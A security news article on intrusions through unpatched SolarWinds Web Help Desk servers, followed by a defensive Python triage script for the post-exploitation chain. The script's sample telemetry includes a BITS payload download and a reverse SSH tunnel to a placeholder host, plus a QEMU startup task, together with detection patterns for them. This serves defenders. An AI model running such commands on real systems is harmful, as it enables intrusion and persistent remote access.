SolarWinds WHD Bugs Open Door To Domain-Level Compromise

Living off the land.
Emily Hill
Contributing Writer

Microsoft and Huntress are warning that attackers exploited unpatched SolarWinds Web Help Desk (WHD) servers to breach organizations in December 2025. The widely used help desk platform is often exposed to the internet, and when critical vulnerabilities go unpatched, it can provide threat actors with a direct entry point into corporate networks.

Researchers say the activity was observed “in the wild,” though it remains unclear whether the same campaign is still ongoing.

In these incidents, attackers exploited one or more critical vulnerabilities in WHD to gain remote access to affected systems. Microsoft has not confirmed which specific flaw was used, but the compromised servers were vulnerable to several high-severity bugs that allow remote code execution.

After breaking in, the attackers used legitimate system tools and remote management software to quietly move deeper into the network and steal high-privilege credentials.

Why It Matters: If attackers gain control of a help desk server that connects to the internal network, they can potentially escalate to full domain compromise. Because the intruders relied heavily on legitimate tools rather than obvious malware, their activity can blend in with normal administrative behavior, making detection more difficult.

  • Entry Through Unpatched Vulnerabilities: The attackers targeted SolarWinds WHD servers that were exposed to the internet and had not been updated with the latest security patches. These systems were vulnerable to multiple critical flaws, including issues that allow unauthenticated remote code execution. In practical terms, this means an attacker could send specially crafted requests to the server and execute commands without needing valid login credentials. Because WHD often connects to internal systems and directories, compromising it can quickly provide a bridge from the public internet into the core enterprise network.
  • Use of Legitimate Remote Access Tools: Once inside, the attackers installed legitimate remote monitoring and management (RMM) software, including Zoho ManageEngine components. Rather than deploying obvious malware, they relied on trusted administrative tools commonly used by IT departments. This approach provided persistent, hands-on remote control of the compromised system while blending in with normal administrative traffic. Security teams may overlook this type of activity because the software itself is not inherently malicious; it’s the context and timing of its deployment that make it suspicious.
  • Built-In Windows Tools Used for Stealth: The attackers also relied heavily on native Windows functionality. They launched PowerShell processes and abused the Background Intelligent Transfer Service (BITS) to download and execute additional payloads. Both tools are legitimate parts of the Windows operating system and are frequently used for routine administrative tasks. This “living off the land” strategy reduces the need for custom malware and helps the attackers avoid triggering traditional antivirus detections, since the activity appears to originate from trusted system processes.
  • Credential Theft and Privilege Escalation: After establishing a foothold, the attackers focused on obtaining higher-level credentials. In some cases, they accessed LSASS (Local Security Authority Subsystem Service) memory to extract cached login credentials. At least one observed intrusion escalated further to a DCSync attack, which allows an attacker with sufficient privileges to impersonate a domain controller and request password data for users across the domain. Successfully performing DCSync effectively grants broad control over enterprise accounts, including high-privilege administrative users.
  • Persistence Through SSH and Virtual Machines: To maintain long-term access, the attackers set up reverse SSH and Remote Desktop Protocol (RDP) connections. In certain environments, they went a step further by creating a scheduled task that launched a QEMU virtual machine at system startup. This virtualized environment allowed them to run malicious operations somewhat isolated from the main operating system while forwarding SSH access through port tunneling. By embedding their persistence mechanism inside a virtual machine, the attackers added another layer of concealment and resilience against removal efforts.
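The chain above is unusual only in its sequence: help desk process spawns a shell, BITS pulls a payload, a non-system process reads LSASS, a user account requests directory replication, a scheduled task boots QEMU. The following script is an added example, not code from the article, Microsoft or Huntress. It replays that sequence against constructed Windows telemetry and flags each stage. The event shapes loosely follow Sysmon process-creation (event 1), process-access (event 10) and the Security log's directory-service-access event (4662), but the field names are simplified assumptions rather than the exact vendor schema, and the assumption that WHD runs under a java.exe process should be adjusted to the service binary in your own deployment.

```python
"""
Added example (not from the article or from Microsoft/Huntress): a small
triage script that replays the post-exploitation chain described above
against constructed Windows telemetry and flags each stage.  Event shapes
loosely follow Sysmon process-creation (1), process-access (10) and the
Security log's directory-service access event (4662); field names are
simplified assumptions, not the exact vendor schema.
"""
import re

# Well-known Active Directory extended-rights GUIDs a DCSync request needs
# (DS-Replication-Get-Changes / DS-Replication-Get-Changes-All).
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Assumption: WHD runs inside a java.exe (Tomcat) process; tune per deployment.
WHD_PARENTS = {"java.exe"}
# Processes expected to open lsass.exe on a healthy host (assumption; tune).
LSASS_ALLOWED_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the list of rule names this event matches (empty if benign)."""
    hits = []
    eid = ev.get("event_id")
    cmd = ev.get("command_line", "")
    if eid == 1:  # process creation
        img, parent = basename(ev.get("image", "")), basename(ev.get("parent_image", ""))
        if parent in WHD_PARENTS and img in SHELLS:
            hits.append("whd_spawns_shell")
        if re.search(r"bitsadmin(\.exe)?\s+/transfer|start-bitstransfer", cmd, re.I):
            hits.append("bits_download")
        if re.search(r"schtasks(\.exe)?\s+/create", cmd, re.I) and re.search(r"qemu", cmd, re.I):
            hits.append("scheduled_task_qemu")
        if re.search(r"\bssh(\.exe)?\b.*\s-R\s", cmd, re.I):
            hits.append("reverse_ssh_tunnel")
    elif eid == 10:  # process access
        if (basename(ev.get("target_image", "")) == "lsass.exe"
                and basename(ev.get("source_image", "")) not in LSASS_ALLOWED_SOURCES):
            hits.append("lsass_access")
    elif eid == 4662:  # directory service object access
        props = {p.lower() for p in ev.get("properties", [])}
        subject = ev.get("subject_account", "")
        # Domain controllers replicate under their machine account (ends in
        # '$'); a user account asking for replication rights is DCSync-like.
        if props & REPLICATION_GUIDS and not subject.endswith("$"):
            hits.append("dcsync_replication_request")
    return hits


def triage(events):
    """Map each rule name to the indices of the events that matched it."""
    findings = {}
    for i, ev in enumerate(events):
        for rule in check_event(ev):
            findings.setdefault(rule, []).append(i)
    return findings


# Constructed sample telemetry (not real logs; 203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "command_line": "cmd.exe /c whoami"},
    {"event_id": 1, "image": r"C:\Windows\System32\bitsadmin.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "bitsadmin /transfer job /download /priority high "
                     "http://203.0.113.10/a.bin C:\\ProgramData\\a.bin"},
    {"event_id": 10, "source_image": r"C:\Users\Public\tool.exe",
     "target_image": r"C:\Windows\System32\lsass.exe"},
    {"event_id": 10, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe"},
    {"event_id": 4662, "subject_account": "helpdesk-svc",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"event_id": 4662, "subject_account": "DC01$",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"event_id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'schtasks /create /sc onstart /tn Updater /tr '
                     r'"C:\ProgramData\q\qemu-system-x86_64.exe -hda disk.qcow2 -nographic"'},
    {"event_id": 1, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "ssh.exe -N -R 2222:127.0.0.1:22 user@203.0.113.10"},
    {"event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, idx in sorted(triage(SAMPLE_EVENTS).items()):
        print(f"{rule}: events {idx}")
```

Each rule on its own is noisy in a large estate (administrators do run schtasks and BITS), which is why the script reports matches per rule rather than alerting on any single one: the value is in seeing several stages land on the same host within a short window, with the help desk server's own service process as the root of the tree. The DCSync rule is the one worth wiring up first, since a 4662 carrying the replication GUIDs from anything other than a domain controller's machine account has almost no benign explanation.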

Go Deeper:
  • Analysis of active exploitation of SolarWinds Web Help Desk – Microsoft
  • Someone’s attacking SolarWinds WHD to steal high‑privilege credentials – but we don’t know who or how – The Register
  • Unpatched SolarWinds WHD instances under active attack – Help Net Security
